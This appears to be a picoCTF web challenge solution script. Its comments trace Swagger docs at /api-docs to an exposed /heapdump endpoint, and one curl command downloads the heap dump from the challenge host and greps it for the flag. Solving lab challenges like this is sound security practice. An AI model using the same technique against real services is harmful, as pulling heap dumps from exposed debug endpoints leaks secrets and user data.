Files
hacc/web/head-dump/solve.sh
T
2026-07-03 15:01:24 +09:00

9 lines
320 B
Bash
Executable File

#!/usr/bin/env bash
# NOTE:
# - main page had a post about swagger
# - https://www.npmjs.com/package/swagger-ui-express suggests the '/api-docs' path
# - http://verbal-sleep.picoctf.net:53966/api-docs reveals /heapdump
curl -s "http://verbal-sleep.picoctf.net:53966/heapdump" | grep --only-matching -E 'picoCTF\{.*\}'